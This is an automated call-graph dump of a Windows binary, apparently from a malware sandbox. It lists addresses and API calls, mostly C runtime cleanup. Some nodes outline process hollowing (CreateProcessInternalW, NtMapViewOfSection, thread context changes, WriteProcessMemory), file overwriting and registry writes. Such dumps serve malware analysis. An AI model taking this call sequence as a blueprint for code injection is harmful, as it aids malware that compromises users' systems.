19720->19475 19721->19477 19722->19479 19723->19481 19724->19483 19725->19485 19726->19487 19727->19489 19728->19491 19729->19493 19730->19495 19731->19497 19732->19499 19733->19501 19734->19503 19735->19505 19736->19507 19737->19509 19738->19511 19739->19513 19740->19515 19741->19517 19742->19519 19743->19521 19744->19523 19745->19525 19746->19527 19747->19529 19748->19531 19749->19533 19750->19535 19751->19537 19752->19539 19753->19541 19754->19543 19755->19545 19756->19547 19757->19549 19758->19551 19759->19553 19760->19555 19761->19557 19762->19559 19763->19561 19764->19563 19765->19565 19766->19567 19767->19569 19768->19571 19769->19573 19770->19575 19771->19577 19772->19579 19773->19581 19774->19583 19775->19585 19776->19587 19777->19589 19778->19597 19780 7ff60e630291 VirtualFree 19779->19780 19781 7ff60e6302a4 19779->19781 19780->19781 19781->19594 19791 7ff60e631174 GetWindowsDirectoryW 19782->19791 19784 7ff60e630873 8 API calls 19784->19614 19786 7ff60e631066 19785->19786 19787 7ff60e631087 GetLastError 19785->19787 19796 7ff60e631394 GetFileSize 19786->19796 19788 7ff60e6301cb CreateThread 19787->19788 19788->19617 19792 7ff60e6311c8 GetVolumeInformationW 19791->19792 19793 7ff60e6311b5 19791->19793 19795 7ff60e63125c 19792->19795 19793->19792 19794 7ff60e6312ae wsprintfW 19794->19784 19795->19794 19801 7ff60e6302b0 VirtualAlloc 19796->19801 19798 7ff60e6313c0 19799 7ff60e631075 CloseHandle 19798->19799 19800 7ff60e6313d4 SetFilePointer ReadFile 19798->19800 19799->19788 19800->19799 19801->19798 19803 7ff60e630830 19802->19803 19804 7ff60e630f8c RegSetValueExW RegCloseKey 19802->19804 19803->19625 19804->19803 19807 7ff60e612337 9 API calls 19806->19807 19808 7ff60e612332 19806->19808 19809 7ff60e612472 FreeLibrary 19807->19809 19810 7ff60e612422 19807->19810 19811 7ff60e611478 LoadLibraryA 19808->19811 19809->19808 19810->19808 19810->19809 19812 7ff60e611496 19811->19812 19813 7ff60e61149d GetProcAddress 19811->19813 19812->19636 19812->19637 19814 7ff60e6114c3 GetProcAddress 19813->19814 19815 7ff60e6114bc 19813->19815 19814->19815 19816 7ff60e6114f5 GetProcAddress 19814->19816 19815->19812 19816->19815 19817 7ff60e611527 GetProcAddress 19816->19817 19817->19815 19818 7ff60e611559 GetProcAddress 19817->19818 19818->19815 19819 7ff60e611588 GetProcAddress 19818->19819 19819->19815 19820 7ff60e6115b7 GetProcAddress 19819->19820 19820->19815 19822 7ff60e6122d7 ExpandEnvironmentStringsW 19821->19822 19823 7ff60e6122f0 ExpandEnvironmentStringsW 19821->19823 19824 7ff60e612307 19822->19824 19823->19824 19824->19640 19824->19641 19826 7ff60e61209c CloseHandle 19825->19826 19827 7ff60e6120ae MapViewOfFile 19825->19827 19828 7ff60e612134 19826->19828 19829 7ff60e6120da CloseHandle CloseHandle 19827->19829 19830 7ff60e6120f4 GetFileSize VirtualAlloc 19827->19830 19828->19637 19828->19649 19828->19650 19829->19828 19830->19828 19831 7ff60e612138 UnmapViewOfFile CloseHandle 19830->19831 19831->19828 19892 7ff60e612bec 19832->19892 19834 7ff60e612e08 19835 7ff60e612e29 NtSetInformationFile 19834->19835 19836 7ff60e612e1d 19834->19836 19835->19836 19837 7ff60e612e9f NtWriteFile 19835->19837 19839 7ff60e612f38 NtCreateSection 19836->19839 19837->19836 19838 7ff60e612f0b GetLastError 19837->19838 19838->19836 19840 7ff60e612f9b 19839->19840 19843 7ff60e612f92 19839->19843 19986 7ff60e611e8c GetFileSize SetFilePointer 19840->19986 19843->19659 19845 7ff60e61302e wcsnlen 19844->19845 19990 7ff60e612a40 19845->19990 19848 7ff60e613084 19854 7ff60e612174 19848->19854 19850 7ff60e6130a7 19850->19848 19997 7ff60e611f38 19850->19997 19853 7ff60e61310d ResumeThread 19853->19848 19855 7ff60e61218a 19854->19855 19856 7ff60e61218c VirtualFree 19854->19856 19855->19637 19856->19855 20017 7ff60e613c0c 19857->20017 19861 7ff60e613adc 19861->19644 19863 7ff60e613ce8 19862->19863 19865 7ff60e61361d OpenProcess 19862->19865 20041 7ff60e613e14 19863->20041 19866 7ff60e611b30 NtSuspendProcess 19865->19866 19867 7ff60e611bb7 19866->19867 19868 7ff60e611b94 NtResumeProcess CloseHandle 19866->19868 20056 7ff60e6133f8 19867->20056 19876 7ff60e611e54 19868->19876 19871 7ff60e611bc0 NtResumeProcess CloseHandle 19871->19876 19872 7ff60e611be3 19873 7ff60e611e60 19872->19873 19874 7ff60e611c26 GetCurrentProcess DuplicateHandle 19872->19874 19875 7ff60e611e67 CloseHandle 19873->19875 19873->19876 19874->19872 19877 7ff60e611c78 CreateThread 19874->19877 19875->19876 19889 7ff60e613bcc 19876->19889 19878 7ff60e611ce1 WaitForSingleObject 19877->19878 19879 7ff60e611cd1 CloseHandle 19877->19879 19880 7ff60e611d20 CloseHandle GetExitCodeThread 19878->19880 19881 7ff60e611cf5 TerminateThread CloseHandle CloseHandle 19878->19881 19879->19872 19882 7ff60e611d52 CloseHandle 19880->19882 19883 7ff60e611d42 CloseHandle 19880->19883 19881->19880 19884 7ff60e611d6f strrchr 19882->19884 19883->19882 20066 7ff60e631d88 19884->20066 19886 7ff60e611da0 GetCurrentProcess DuplicateHandle 19886->19876 19888 7ff60e611e08 GetCurrentProcess DuplicateHandle 19886->19888 19888->19876 20371 7ff60e614368 19889->20371 19899 7ff60e613970 19892->19899 19896 7ff60e612c22 19897 7ff60e612c47 RtlInitUnicodeString NtOpenFile 19896->19897 19898 7ff60e612d17 19897->19898 19898->19834 19900 7ff60e613988 construct shared_ptr type_info::_name_internal_method 19899->19900 19906 7ff60e614e20 19900->19906 19903 7ff60e613d10 19965 7ff60e614a18 19903->19965 19907 7ff60e614e38 type_info::_name_internal_method 19906->19907 19910 7ff60e614e50 19907->19910 19909 7ff60e612c0d 19909->19903 19911 7ff60e614e72 type_info::_name_internal_method 19910->19911 19912 7ff60e614e79 type_info::_name_internal_method 19911->19912 19913 7ff60e614eaa 19911->19913 19917 7ff60e614d1c 19912->19917 19928 7ff60e61447c 19913->19928 19916 7ff60e614ea8 type_info::_name_internal_method char_traits 19916->19909 19918 7ff60e614d3e type_info::_name_internal_method 19917->19918 19920 7ff60e614d4f type_info::_name_internal_method 19918->19920 19934 7ff60e61485c 19918->19934 19921 7ff60e614db5 19920->19921 19922 7ff60e614d85 19920->19922 19924 7ff60e61447c type_info::_name_internal_method 70 API calls 19921->19924 19937 7ff60e615330 19922->19937 19927 7ff60e614db3 type_info::_name_internal_method char_traits 19924->19927 19925 7ff60e614da2 19941 7ff60e61525c 19925->19941 19927->19916 19929 7ff60e614499 type_info::_name_internal_method 19928->19929 19930 7ff60e6144aa 19929->19930 19950 7ff60e614840 19929->19950 19933 7ff60e6144d2 type_info::_name_internal_method 19930->19933 19953 7ff60e61409c 19930->19953 19933->19916 19945 7ff60e6404f8 19934->19945 19938 7ff60e615358 type_info::_name_internal_method 19937->19938 19939 7ff60e61534e 19937->19939 19938->19925 19940 7ff60e61485c _Mtx_guard::~_Mtx_guard 70 API calls 19939->19940 19940->19938 19942 7ff60e61527f 19941->19942 19944 7ff60e615289 type_info::_name_internal_method char_traits 19941->19944 19943 7ff60e61485c _Mtx_guard::~_Mtx_guard 70 API calls 19942->19943 19943->19944 19944->19927 19946 7ff60e632eb4 std::exception::exception 68 API calls 19945->19946 19947 7ff60e640510 19946->19947 19948 7ff60e632504 _CxxThrowException RtlPcToFileHeader RaiseException 19947->19948 19949 7ff60e64052d 19948->19949 19957 7ff60e6404c0 19950->19957 19954 7ff60e6140d6 _Ucopy type_info::_name_internal_method 19953->19954 19962 7ff60e61489c 19954->19962 19956 7ff60e6141d0 construct _Ucopy type_info::_name_internal_method char_traits 19956->19933 19958 7ff60e632eb4 std::exception::exception 68 API calls 19957->19958 19959 7ff60e6404d8 19958->19959 19960 7ff60e632504 _CxxThrowException RtlPcToFileHeader RaiseException 19959->19960 19961 7ff60e6404f5 19960->19961 19963 7ff60e6148e0 _DebugMallocator 70 API calls 19962->19963 19964 7ff60e6148b9 19963->19964 19964->19956 19966 7ff60e614a30 type_info::_name_internal_method 19965->19966 19969 7ff60e614a48 19966->19969 19968 7ff60e613d2d 19968->19896 19970 7ff60e614a6a type_info::_name_internal_method 19969->19970 19971 7ff60e614a71 type_info::_name_internal_method 19970->19971 19972 7ff60e614aa5 19970->19972 19978 7ff60e614900 19971->19978 19973 7ff60e614acc 19972->19973 19974 7ff60e614840 _Mtx_guard::~_Mtx_guard 70 API calls 19972->19974 19975 7ff60e61447c type_info::_name_internal_method 70 API calls 19973->19975 19977 7ff60e614aa0 type_info::_name_internal_method char_traits 19973->19977 19974->19973 19975->19977 19977->19968 19979 7ff60e614922 type_info::_name_internal_method 19978->19979 19980 7ff60e61485c _Mtx_guard::~_Mtx_guard 70 API calls 19979->19980 19981 7ff60e614933 type_info::_name_internal_method 19979->19981 19980->19981 19982 7ff60e614984 19981->19982 19983 7ff60e614840 _Mtx_guard::~_Mtx_guard 70 API calls 19981->19983 19984 7ff60e61447c type_info::_name_internal_method 70 API calls 19982->19984 19985 7ff60e6149b1 type_info::_name_internal_method char_traits 19982->19985 19983->19982 19984->19985 19985->19977 19987 7ff60e611ed7 19986->19987 19988 7ff60e611f2d NtClose 19987->19988 19989 7ff60e611ee1 WriteFile SetFilePointer 19987->19989 19988->19843 19989->19987 20005 7ff60e611600 GetModuleHandleA GetProcAddress 19990->20005 19993 7ff60e612a67 lstrcatW CreateProcessInternalW 19994 7ff60e612a60 19993->19994 19994->19848 19995 7ff60e612b44 NtMapViewOfSection 19994->19995 19996 7ff60e612bc9 19995->19996 19996->19850 19998 7ff60e611f5d 19997->19998 20007 7ff60e612838 19998->20007 20001 7ff60e611f96 20001->19848 20001->19853 20003 7ff60e611fb1 20003->20001 20004 7ff60e612001 WriteProcessMemory 20003->20004 20004->20001 20006 7ff60e611639 20005->20006 20006->19993 20006->19994 20008 7ff60e6128d9 GetThreadContext 20007->20008 20009 7ff60e61285b Wow64GetThreadContext 20007->20009 20010 7ff60e61293a SetThreadContext 20008->20010 20012 7ff60e611f92 20008->20012 20011 7ff60e6128af Wow64SetThreadContext 20009->20011 20009->20012 20010->20012 20011->20012 20012->20001 20013 7ff60e612974 20012->20013 20014 7ff60e612991 Wow64GetThreadContext 20013->20014 20015 7ff60e6129d2 GetThreadContext 20013->20015 20016 7ff60e6129c5 20014->20016 20015->20016 20016->20003 20022 7ff60e631590 20017->20022 20019 7ff60e613ac0 20019->19861 20020 7ff60e6139c0 SysAllocString 20019->20020 20021 7ff60e613a05 20020->20021 20021->19861 20024 7ff60e63159b 20022->20024 20023 7ff60e63244c malloc 68 API calls 20023->20024 20024->20023 20025 7ff60e6315b4 20024->20025 20026 7ff60e633d88 _callnewh DecodePointer 20024->20026 20027 7ff60e6315ba std::_Xbad_alloc 20024->20027 20025->20019 20026->20024 20032 7ff60e632504 20027->20032 20029 7ff60e6315f8 20037 7ff60e632f2c 20029->20037 20031 7ff60e63161a 20031->20019 20033 7ff60e632584 RtlPcToFileHeader 20032->20033 20034 7ff60e632574 20032->20034 20035 7ff60e6325a9 20033->20035 20036 7ff60e6325c4 RaiseException 20033->20036 20034->20033 20035->20036 20036->20029 20038 7ff60e633018 20037->20038 20039 7ff60e633030 20038->20039 20040 7ff60e63240c free 68 API calls 20038->20040 20039->20031 20040->20039 20042 7ff60e613e29 20041->20042 20043 7ff60e613e36 20041->20043 20045 7ff60e6400b0 20042->20045 20043->19865 20046 7ff60e6400e2 WideCharToMultiByte 20045->20046 20055 7ff60e6400db 20045->20055 20048 7ff60e64012a GetLastError 20046->20048 20049 7ff60e640134 20046->20049 20048->20049 20050 7ff60e631590 _Allocate 70 API calls 20049->20050 20051 7ff60e64014c 20050->20051 20052 7ff60e640154 WideCharToMultiByte 20051->20052 20051->20055 20053 7ff60e64017d 20052->20053 20052->20055 20054 7ff60e640185 GetLastError 20053->20054 20054->20055 20055->20043 20057 7ff60e613427 20056->20057 20062 7ff60e613433 20056->20062 20058 7ff60e63240c free 68 API calls 20057->20058 20058->20062 20059 7ff60e61347c NtQuerySystemInformation 20059->20062 20064 7ff60e611bbc 20059->20064 20060 7ff60e63240c free 68 API calls 20060->20062 20061 7ff60e63244c malloc 68 API calls 20061->20062 20062->20059 20062->20060 20062->20061 20063 7ff60e6134be 20062->20063 20062->20064 20065 7ff60e63240c free 68 API calls 20063->20065 20064->19871 20064->19872 20065->20064 20067 7ff60e631d95 20066->20067 20068 7ff60e631db9 20066->20068 20067->20068 20069 7ff60e631d9a 20067->20069 20083 7ff60e631ca4 20068->20083 20071 7ff60e6359a4 _errno 68 API calls 20069->20071 20073 7ff60e631d9f 20071->20073 20074 7ff60e6347a0 _invalid_parameter_noinfo 16 API calls 20073->20074 20076 7ff60e631daa 20074->20076 20075 7ff60e631dfc 20077 7ff60e6359a4 _errno 68 API calls 20075->20077 20076->19886 20078 7ff60e631e01 20077->20078 20079 7ff60e6347a0 _invalid_parameter_noinfo 16 API calls 20078->20079 20080 7ff60e631e0c __ascii_stricmp 20079->20080 20080->19886 20081 7ff60e635484 75 API calls _tolower_l 20082 7ff60e631e13 20081->20082 20082->20080 20082->20081 20084 7ff60e631cba 20083->20084 20090 7ff60e631d1b 20083->20090 20091 7ff60e63572c 20084->20091 20087 7ff60e631cf4 20087->20090 20110 7ff60e634ebc 20087->20110 20090->20075 20090->20082 20092 7ff60e635750 _getptd_noexit 68 API calls 20091->20092 20093 7ff60e635737 20092->20093 20094 7ff60e631cbf 20093->20094 20095 7ff60e633e20 __updatetmbcinfo 68 API calls 20093->20095 20094->20087 20096 7ff60e634ac4 20094->20096 20095->20094 20097 7ff60e63572c _getptd 68 API calls 20096->20097 20098 7ff60e634acf 20097->20098 20099 7ff60e634af8 20098->20099 20100 7ff60e634aea 20098->20100 20101 7ff60e63ac78 _lock 68 API calls 20099->20101 20103 7ff60e63572c _getptd 68 API calls 20100->20103 20102 7ff60e634b02 20101->20102 20121 7ff60e634b3c 20102->20121 20106 7ff60e634aef 20103->20106 20108 7ff60e634b30 20106->20108 20109 7ff60e633e20 __updatetmbcinfo 68 API calls 20106->20109 20108->20087 20109->20108 20111 7ff60e63572c _getptd 68 API calls 20110->20111 20112 7ff60e634ecb 20111->20112 20113 7ff60e634ee6 20112->20113 20114 7ff60e63ac78 _lock 68 API calls 20112->20114 20115 7ff60e634f68 20113->20115 20118 7ff60e633e20 __updatetmbcinfo 68 API calls 20113->20118 20119 7ff60e634ef9 20114->20119 20115->20090 20116 7ff60e634f2f 20370 7ff60e63ae60 LeaveCriticalSection 20116->20370 20118->20115 20119->20116 20120 7ff60e63240c free 68 API calls 20119->20120 20120->20116 20122 7ff60e634b16 20121->20122 20123 7ff60e634b4e _copytlocinfo_nolock _updatetlocinfoEx_nolock 20121->20123 20125 7ff60e63ae60 LeaveCriticalSection 20122->20125 20123->20122 20126 7ff60e634888 20123->20126 20127 7ff60e634924 20126->20127 20129 7ff60e6348ab 20126->20129 20128 7ff60e634977 20127->20128 20130 7ff60e63240c free 68 API calls 20127->20130 20147 7ff60e6349a4 20128->20147 20194 7ff60e63ba30 20128->20194 20129->20127 20131 7ff60e6348ea 20129->20131 20137 7ff60e63240c free 68 API calls 20129->20137 20132 7ff60e634948 20130->20132 20135 7ff60e63490c 20131->20135 20144 7ff60e63240c free 68 API calls 20131->20144 20134 7ff60e63240c free 68 API calls 20132->20134 20138 7ff60e63495c 20134->20138 20139 7ff60e63240c free 68 API calls 20135->20139 20142 7ff60e6348de 20137->20142 20143 7ff60e63240c free 68 API calls 20138->20143 20145 7ff60e634918 20139->20145 20140 7ff60e634a02 20141 7ff60e63240c free 68 API calls 20141->20147 20154 7ff60e63b0ac 20142->20154 20148 7ff60e63496b 20143->20148 20149 7ff60e634900 20144->20149 20150 7ff60e63240c free 68 API calls 20145->20150 20147->20140 20151 7ff60e63240c 68 API calls free 20147->20151 20152 7ff60e63240c free 68 API calls 20148->20152 20182 7ff60e63b6d8 20149->20182 20150->20127 20151->20147 20152->20128 20155 7ff60e63b1b0 20154->20155 20156 7ff60e63b0b5 20154->20156 20155->20131 20157 7ff60e63b0cf 20156->20157 20158 7ff60e63240c free 68 API calls 20156->20158 20159 7ff60e63b0e1 20157->20159 20160 7ff60e63240c free 68 API calls 20157->20160 20158->20157 20161 7ff60e63b0f3 20159->20161 20162 7ff60e63240c free 68 API calls 20159->20162 20160->20159 20163 7ff60e63b105 20161->20163 20164 7ff60e63240c free 68 API calls 20161->20164 20162->20161 20165 7ff60e63b117 20163->20165 20166 7ff60e63240c free 68 API calls 20163->20166 20164->20163 20167 7ff60e63b129 20165->20167 20169 7ff60e63240c free 68 API calls 20165->20169 20166->20165 20168 7ff60e63b13b 20167->20168 20170 7ff60e63240c free 68 API calls 20167->20170 20171 7ff60e63b14d 20168->20171 20172 7ff60e63240c free 68 API calls 20168->20172 20169->20167 20170->20168 20173 7ff60e63b15f 20171->20173 20174 7ff60e63240c free 68 API calls 20171->20174 20172->20171 20175 7ff60e63b171 20173->20175 20176 7ff60e63240c free 68 API calls 20173->20176 20174->20173 20177 7ff60e63b186 20175->20177 20179 7ff60e63240c free 68 API calls 20175->20179 20176->20175 20178 7ff60e63b19b 20177->20178 20180 7ff60e63240c free 68 API calls 20177->20180 20178->20155 20181 7ff60e63240c free 68 API calls 20178->20181 20179->20177 20180->20178 20181->20155 20183 7ff60e63b6dd 20182->20183 20192 7ff60e63b73e 20182->20192 20184 7ff60e63240c free 68 API calls 20183->20184 20186 7ff60e63b6f6 20183->20186 20184->20186 20185 7ff60e63b708 20188 7ff60e63b71a 20185->20188 20189 7ff60e63240c free 68 API calls 20185->20189 20186->20185 20187 7ff60e63240c free 68 API calls 20186->20187 20187->20185 20190 7ff60e63b72c 20188->20190 20191 7ff60e63240c free 68 API calls 20188->20191 20189->20188 20190->20192 20193 7ff60e63240c free 68 API calls 20190->20193 20191->20190 20192->20135 20193->20192 20195 7ff60e63ba39 20194->20195 20369 7ff60e634998 20194->20369 20196 7ff60e63240c free 68 API calls 20195->20196 20197 7ff60e63ba4a 20196->20197 20198 7ff60e63240c free 68 API calls 20197->20198 20199 7ff60e63ba53 20198->20199 20200 7ff60e63240c free 68 API calls 20199->20200 20201 7ff60e63ba5c 20200->20201 20202 7ff60e63240c free 68 API calls 20201->20202 20203 7ff60e63ba65 20202->20203 20204 7ff60e63240c free 68 API calls 20203->20204 20205 7ff60e63ba6e 20204->20205 20206 7ff60e63240c free 68 API calls 20205->20206 20207 7ff60e63ba77 20206->20207 20208 7ff60e63240c free 68 API calls 20207->20208 20209 7ff60e63ba7f 20208->20209 20210 7ff60e63240c free 68 API calls 20209->20210 20211 7ff60e63ba88 20210->20211 20212 7ff60e63240c free 68 API calls 20211->20212 20213 7ff60e63ba91 20212->20213 20214 7ff60e63240c free 68 API calls 20213->20214 20215 7ff60e63ba9a 20214->20215 20216 7ff60e63240c free 68 API calls 20215->20216 20217 7ff60e63baa3 20216->20217 20218 7ff60e63240c free 68 API calls 20217->20218 20219 7ff60e63baac 20218->20219 20220 7ff60e63240c free 68 API calls 20219->20220 20221 7ff60e63bab5 20220->20221 20222 7ff60e63240c free 68 API calls 20221->20222 20223 7ff60e63babe 20222->20223 20224 7ff60e63240c free 68 API calls 20223->20224 20225 7ff60e63bac7 20224->20225 20226 7ff60e63240c free 68 API calls 20225->20226 20227 7ff60e63bad0 20226->20227 20228 7ff60e63240c free 68 API calls 20227->20228 20229 7ff60e63badc 20228->20229 20230 7ff60e63240c free 68 API calls 20229->20230 20231 7ff60e63bae8 20230->20231 20232 7ff60e63240c free 68 API calls 20231->20232 20233 7ff60e63baf4 20232->20233 20234 7ff60e63240c free 68 API calls 20233->20234 20235 7ff60e63bb00 20234->20235 20236 7ff60e63240c free 68 API calls 20235->20236 20237 7ff60e63bb0c 20236->20237 20238 7ff60e63240c free 68 API calls 20237->20238 20239 7ff60e63bb18 20238->20239 20240 7ff60e63240c free 68 API calls 20239->20240 20241 7ff60e63bb24 20240->20241 20242 7ff60e63240c free 68 API calls 20241->20242 20243 7ff60e63bb30 20242->20243 20244 7ff60e63240c free 68 API calls 20243->20244 20245 7ff60e63bb3c 20244->20245 20246 7ff60e63240c free 68 API calls 20245->20246 20247 7ff60e63bb48 20246->20247 20248 7ff60e63240c free 68 API calls 20247->20248 20249 7ff60e63bb54 20248->20249 20250 7ff60e63240c free 68 API calls 20249->20250 20251 7ff60e63bb60 20250->20251 20252 7ff60e63240c free 68 API calls 20251->20252 20253 7ff60e63bb6c 20252->20253 20254 7ff60e63240c free 68 API calls 20253->20254 20255 7ff60e63bb78 20254->20255 20256 7ff60e63240c free 68 API calls 20255->20256 20257 7ff60e63bb84 20256->20257 20258 7ff60e63240c free 68 API calls 20257->20258 20259 7ff60e63bb90 20258->20259 20260 7ff60e63240c free 68 API calls 20259->20260 20261 7ff60e63bb9c 20260->20261 20262 7ff60e63240c free 68 API calls 20261->20262 20263 7ff60e63bba8 20262->20263 20264 7ff60e63240c free 68 API calls 20263->20264 20265 7ff60e63bbb4 20264->20265 20266 7ff60e63240c free 68 API calls 20265->20266 20267 7ff60e63bbc0 20266->20267 20268 7ff60e63240c free 68 API calls 20267->20268 20269 7ff60e63bbcc 20268->20269 20270 7ff60e63240c free 68 API calls 20269->20270 20271 7ff60e63bbd8 20270->20271 20272 7ff60e63240c free 68 API calls 20271->20272 20273 7ff60e63bbe4 20272->20273 20274 7ff60e63240c free 68 API calls 20273->20274 20275 7ff60e63bbf0 20274->20275 20276 7ff60e63240c free 68 API calls 20275->20276 20277 7ff60e63bbfc 20276->20277 20278 7ff60e63240c free 68 API calls 20277->20278 20279 7ff60e63bc08 20278->20279 20280 7ff60e63240c free 68 API calls 20279->20280 20281 7ff60e63bc14 20280->20281 20282 7ff60e63240c free 68 API calls 20281->20282 20283 7ff60e63bc20 20282->20283 20284 7ff60e63240c free 68 API calls 20283->20284 20285 7ff60e63bc2c 20284->20285 20286 7ff60e63240c free 68 API calls 20285->20286 20287 7ff60e63bc38 20286->20287 20288 7ff60e63240c free 68 API calls 20287->20288 20289 7ff60e63bc44 20288->20289 20290 7ff60e63240c free 68 API calls 20289->20290 20291 7ff60e63bc50 20290->20291 20292 7ff60e63240c free 68 API calls 20291->20292 20293 7ff60e63bc5c 20292->20293 20294 7ff60e63240c free 68 API calls 20293->20294 20295 7ff60e63bc68 20294->20295 20296 7ff60e63240c free 68 API calls 20295->20296 20297 7ff60e63bc74 20296->20297 20298 7ff60e63240c free 68 API calls 20297->20298 20299 7ff60e63bc80 20298->20299 20300 7ff60e63240c free 68 API calls 20299->20300 20301 7ff60e63bc8c 20300->20301 20302 7ff60e63240c free 68 API calls 20301->20302 20303 7ff60e63bc98 20302->20303 20304 7ff60e63240c free 68 API calls 20303->20304 20305 7ff60e63bca4 20304->20305 20306 7ff60e63240c free 68 API calls 20305->20306 20307 7ff60e63bcb0 20306->20307 20308 7ff60e63240c free 68 API calls 20307->20308 20309 7ff60e63bcbc 20308->20309 20310 7ff60e63240c free 68 API calls 20309->20310 20311 7ff60e63bcc8 20310->20311 20312 7ff60e63240c free 68 API calls 20311->20312 20313 7ff60e63bcd4 20312->20313 20314 7ff60e63240c free 68 API calls 20313->20314 20315 7ff60e63bce0 20314->20315 20316 7ff60e63240c free 68 API calls 20315->20316 20317 7ff60e63bcec 20316->20317 20318 7ff60e63240c free 68 API calls 20317->20318 20319 7ff60e63bcf8 20318->20319 20320 7ff60e63240c free 68 API calls 20319->20320 20321 7ff60e63bd04 20320->20321 20322 7ff60e63240c free 68 API calls 20321->20322 20323 7ff60e63bd10 20322->20323 20324 7ff60e63240c free 68 API calls 20323->20324 20325 7ff60e63bd1c 20324->20325 20326 7ff60e63240c free 68 API calls 20325->20326 20327 7ff60e63bd28 20326->20327 20328 7ff60e63240c free 68 API calls 20327->20328 20329 7ff60e63bd34 20328->20329 20330 7ff60e63240c free 68 API calls 20329->20330 20331 7ff60e63bd40 20330->20331 20332 7ff60e63240c free 68 API calls 20331->20332 20333 7ff60e63bd4c 20332->20333 20334 7ff60e63240c free 68 API calls 20333->20334 20335 7ff60e63bd58 20334->20335 20336 7ff60e63240c free 68 API calls 20335->20336 20337 7ff60e63bd64 20336->20337 20338 7ff60e63240c free 68 API calls 20337->20338 20339 7ff60e63bd70 20338->20339 20340 7ff60e63240c free 68 API calls 20339->20340 20341 7ff60e63bd7c 20340->20341 20342 7ff60e63240c free 68 API calls 20341->20342 20343 7ff60e63bd88 20342->20343 20344 7ff60e63240c free 68 API calls 20343->20344 20345 7ff60e63bd94 20344->20345 20346 7ff60e63240c free 68 API calls 20345->20346 20347 7ff60e63bda0 20346->20347 20348 7ff60e63240c free 68 API calls 20347->20348 20349 7ff60e63bdac 20348->20349 20350 7ff60e63240c free 68 API calls 20349->20350 20351 7ff60e63bdb8 20350->20351 20352 7ff60e63240c free 68 API calls 20351->20352 20353 7ff60e63bdc4 20352->20353 20354 7ff60e63240c free 68 API calls 20353->20354 20355 7ff60e63bdd0 20354->20355 20356 7ff60e63240c free 68 API calls 20355->20356 20357 7ff60e63bddc 20356->20357 20358 7ff60e63240c free 68 API calls 20357->20358 20359 7ff60e63bde8 20358->20359 20360 7ff60e63240c free 68 API calls 20359->20360 20361 7ff60e63bdf4 20360->20361 20362 7ff60e63240c free 68 API calls 20361->20362 20363 7ff60e63be00 20362->20363 20364 7ff60e63240c free 68 API calls 20363->20364 20365 7ff60e63be0c 20364->20365 20366 7ff60e63240c free 68 API calls 20365->20366 20367 7ff60e63be18 20366->20367 20368 7ff60e63240c free 68 API calls 20367->20368 20368->20369 20369->20141 20372 7ff60e61437c 20371->20372 20373 7ff60e613bdf 20371->20373 20375 7ff60e613e50 20372->20375 20373->19642 20376 7ff60e613e7a 20375->20376 20377 7ff60e613ea5 20375->20377 20376->20377 20379 7ff60e613d34 20376->20379 20377->20373 20382 7ff60e613b84 20379->20382 20381 7ff60e613d4b 20381->20377 20385 7ff60e614304 20382->20385 20384 7ff60e613b97 20384->20381 20386 7ff60e614318 SysFreeString 20385->20386 20387 7ff60e614332 20385->20387 20386->20387 20387->20384 20389 7ff60e639eb0 20388->20389 20390 7ff60e63384e 20389->20390 20391 7ff60e6359a4 _errno 68 API calls 20389->20391 20390->19142 20390->19144 20392 7ff60e639ed5 20391->20392 20393 7ff60e6347a0 _invalid_parameter_noinfo 16 API calls 20392->20393 20393->20390 20398 7ff60e63a3e1 20394->20398 20395 7ff60e63a3e6 20396 7ff60e6359a4 _errno 68 API calls 20395->20396 20397 7ff60e6339d5 20395->20397 20402 7ff60e63a410 20396->20402 20397->19170 20397->19175 20398->20395 20398->20397 20400 7ff60e63a424 20398->20400 20399 7ff60e6347a0 _invalid_parameter_noinfo 16 API calls 20399->20397 20400->20397 20401 7ff60e6359a4 _errno 68 API calls 20400->20401 20401->20402 20402->20399 20404 7ff60e63a2df 20403->20404 20407 7ff60e63a2d5 20403->20407 20405 7ff60e6359a4 _errno 68 API calls 20404->20405 20406 7ff60e63a2e8 20405->20406 20408 7ff60e6347a0 _invalid_parameter_noinfo 16 API calls 20406->20408 20407->20404 20410 7ff60e63a316 20407->20410 20409 7ff60e6339ef 20408->20409 20409->19176 20409->19178 20410->20409 20411 7ff60e6359a4 _errno 68 API calls 20410->20411 20411->20406 20446 7ff60e63a1c4 20412->20446 20415 7ff60e63a4e9 LoadLibraryExW 20419 7ff60e63a506 GetLastError 20415->20419 20420 7ff60e63a52e GetProcAddress 20415->20420 20416 7ff60e63a5dc IsDebuggerPresent 20417 7ff60e63a5e6 20416->20417 20418 7ff60e63a603 20416->20418 20422 7ff60e63a5eb OutputDebugStringW 20417->20422 20424 7ff60e63a5f4 20417->20424 20423 7ff60e63a608 DecodePointer 20418->20423 20418->20424 20425 7ff60e63a515 LoadLibraryW 20419->20425 20427 7ff60e63a5f9 20419->20427 20421 7ff60e63a547 7 API calls 20420->20421 20420->20427 20421->20416 20426 7ff60e63a5bc GetProcAddress EncodePointer 20421->20426 20422->20424 20423->20427 20424->20427 20431 7ff60e63a634 DecodePointer DecodePointer 20424->20431 20434 7ff60e63a652 20424->20434 20425->20420 20425->20427 20426->20416 20428 7ff60e636bb0 _atodbl_l 9 API calls 20427->20428 20432 7ff60e63a6ff 20428->20432 20429 7ff60e63a69a DecodePointer 20430 7ff60e63a6ce DecodePointer 20429->20430 20433 7ff60e63a6a5 20429->20433 20430->20427 20431->20434 20432->19187 20433->20430 20435 7ff60e63a6bb DecodePointer 20433->20435 20434->20429 20434->20430 20436 7ff60e63a688 20434->20436 20435->20430 20435->20436 20436->20430 20438 7ff60e636bb9 20437->20438 20439 7ff60e633740 20438->20439 20440 7ff60e638460 IsProcessorFeaturePresent 20438->20440 20439->19188 20441 7ff60e638477 20440->20441 20449 7ff60e63a104 RtlCaptureContext 20441->20449 20447 7ff60e63a1d6 GetModuleHandleW GetProcAddress 20446->20447 20448 7ff60e63a1fc 20446->20448 20447->20448 20448->20415 20448->20416 20450 7ff60e63a11e RtlLookupFunctionEntry 20449->20450 20451 7ff60e63848a 20450->20451 20452 7ff60e63a134 RtlVirtualUnwind 20450->20452 20453 7ff60e638414 IsDebuggerPresent 20451->20453 20452->20450 20452->20451 20454 7ff60e638433 _call_reportfault 20453->20454 20458 7ff60e63a24c SetUnhandledExceptionFilter UnhandledExceptionFilter 20454->20458 20460 7ff60e633dfb ExitProcess 20459->20460 20461 7ff60e633de4 GetProcAddress 20459->20461 20461->20460 20463 7ff60e63ac78 _lock 60 API calls 20462->20463 20464 7ff60e634022 20463->20464 20465 7ff60e634049 DecodePointer 20464->20465 20468 7ff60e634110 doexit 20464->20468 20467 7ff60e634067 DecodePointer 20465->20467 